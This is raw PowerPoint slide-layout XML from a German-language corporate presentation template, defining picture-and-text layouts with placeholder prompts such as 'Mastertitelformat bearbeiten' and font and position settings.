                <a:t>Textformatierung über die Listenebenen: Start &gt; Absatz:</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rechteck 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF899E80-592C-4BC0-9A2A-C59A9660C840}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2835275" y="-308663"/>
              <a:ext cx="482600" cy="2039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800">
                <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="!!Titelplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F423363-7999-42CD-8196-3FF4555545AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Mastertitelformat bearbeiten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="!!Textplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3A62680-894C-4CDE-AD9A-42EE8C9BA889}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696000" y="1717762"/>
            <a:ext cx="5220613" cy="4356000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="de-DE" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="de-DE" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="de-DE" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="de-DE" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="de-DE"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Bildplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46C53E17-0EAB-4DF4-8ADD-3440CA205157}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6275388" y="1778019"/>
            <a:ext cx="5221286" cy="2937600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="72000" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Bild durch Klicken auf Symbol hinzufügen</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="!!A1DigitalIdentifier">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF71950-B1CF-4568-8A5D-917DEC7E19F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10229468" y="6251744"/>
            <a:ext cx="1266532" cy="273600"/>
          </a:xfr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496051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Bild links">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="!!Hinweise">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF7C06D8-0A2A-448E-8613-5EA8BF1C4CC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-30455" y="-316200"/>
            <a:ext cx="5910431" cy="219048"/>
            <a:chOff x="-2186263" y="-316200"/>
            <a:chExt cx="5910431" cy="219048"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="Grafik 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1722009E-C613-45F1-97B5-61E68A110A46}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2009882" y="-316200"/>
              <a:ext cx="1714286" cy="219048"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Textfeld 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C368669-D76E-4461-A52D-4DD32A1F6485}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2186263" y="-299009"/>
              <a:ext cx="4196145" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="36000" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="de-CH" sz="1200" dirty="0">
                  <a:highlight>
                    <a:srgbClr val="FFFF00"/>
                  </a:highlight>
                  <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Textformatierung über die Listenebenen: Start &gt; Absatz:</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rechteck 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A19A177-3262-4D27-836B-75E809E97883}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2835275" y="-308663"/>
              <a:ext cx="482600" cy="2039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800">
                <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="!!Titelplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C382D9E6-488E-478A-9CA6-B783A87B9CEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6276000" y="487656"/>
            <a:ext cx="5220000" cy="864000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Mastertitelformat bearbeiten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="!!Textplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3A62680-894C-4CDE-AD9A-42EE8C9BA889}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6275388" y="1718382"/>
            <a:ext cx="5220612" cy="4356000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="de-DE"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Bildplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46C53E17-0EAB-4DF4-8ADD-3440CA205157}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695325" y="558800"/>
            <a:ext cx="5220612" cy="5500800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="72000" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Bild durch Klicken auf Symbol hinzufügen</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="!!A1DigitalIdentifier">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16104B0D-DEDA-459F-92B7-ACC13E6820E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10229468" y="6251744"/>
            <a:ext cx="1266532" cy="273600"/>
          </a:xfr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2919999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Bild rechts">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="!!Hinweise">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAFA1CAF-8709-4ADD-B173-747689DCF0B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-30455" y="-316200"/>
            <a:ext cx="5910431" cy="219048"/>
            <a:chOff x="-2186263" y="-316200"/>
            <a:chExt cx="5910431" cy="219048"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="Grafik 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C273D15-D219-40C2-B8C9-D30BB12CAF39}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2009882" y="-316200"/>
              <a:ext cx="1714286" cy="219048"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Textfeld 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0C7D21C-DC6F-45B7-88B8-25DAC690469D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2186263" y="-299009"/>
              <a:ext cx="4196145" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="36000" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="de-CH" sz="1200" dirty="0">
                  <a:highlight>
                    <a:srgbClr val="FFFF00"/>
                  </a:highlight>
                  <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Textformatierung über die Listenebenen: Start &gt; Absatz:</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rechteck 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF899E80-592C-4BC0-9A2A-C59A9660C840}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2835275" y="-308663"/>
              <a:ext cx="482600" cy="2039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800">
                <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="!!Titelplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD3DCC6A-7F02-4F07-BC04-C8AEB305B119}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="686475" y="487656"/>
            <a:ext cx="5220000" cy="864000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Mastertitelformat bearbeiten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="!!Textplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3A62680-894C-4CDE-AD9A-42EE8C9BA889}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696000" y="1717762"/>
            <a:ext cx="5220613" cy="4356000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="de-DE" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="de-DE" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="de-DE" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="de-DE" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="de-DE"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Bildplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46C53E17-0EAB-4DF4-8ADD-3440CA205157}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6275388" y="558800"/>
            <a:ext cx="5221286" cy="5500800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="72000" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Bild durch Klicken auf Symbol hinzufügen</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="!!A1DigitalIdentifier">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF71950-B1CF-4568-8A5D-917DEC7E19F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10229468" y="6251744"/>
            <a:ext cx="1266532" cy="273600"/>
          </a:xfr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3996665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Inhalt links">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="!!Hinweise">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02F2998D-B779-43E4-BD60-2C072EBC0009}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-30455" y="-316200"/>
            <a:ext cx="5910431" cy="219048"/>
            <a:chOff x="-2186263" y="-316200"/>
            <a:chExt cx="5910431" cy="219048"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="Grafik 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5496D1CF-3A75-4D16-B48E-FFF02150B30D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2009882" y="-316200"/>
              <a:ext cx="1714286" cy="219048"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Textfeld 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2BE83EF-E530-490D-8429-B1733EF85AB2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2186263" y="-299009"/>
              <a:ext cx="4196145" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="36000" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="de-CH" sz="1200" dirty="0">
                  <a:highlight>
                    <a:srgbClr val="FFFF00"/>
                  </a:highlight>
                  <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Textformatierung über die Listenebenen: Start &gt; Absatz:</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rechteck 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77EE1776-20F1-4C2E-98B9-AF98467770F2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2835275" y="-308663"/>
              <a:ext cx="482600" cy="2039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800">
                <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="!!Titelplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F63EA25B-3275-47E6-B7A7-66F03CDC8EDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6276000" y="487656"/>
            <a:ext cx="5220000" cy="864000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Mastertitelformat bearbeiten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="!!Textplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3A62680-894C-4CDE-AD9A-42EE8C9BA889}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6275388" y="1718246"/>
            <a:ext cx="5220612" cy="4356000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="de-DE"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9414283C-C578-402F-98C4-79C2D5115F20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
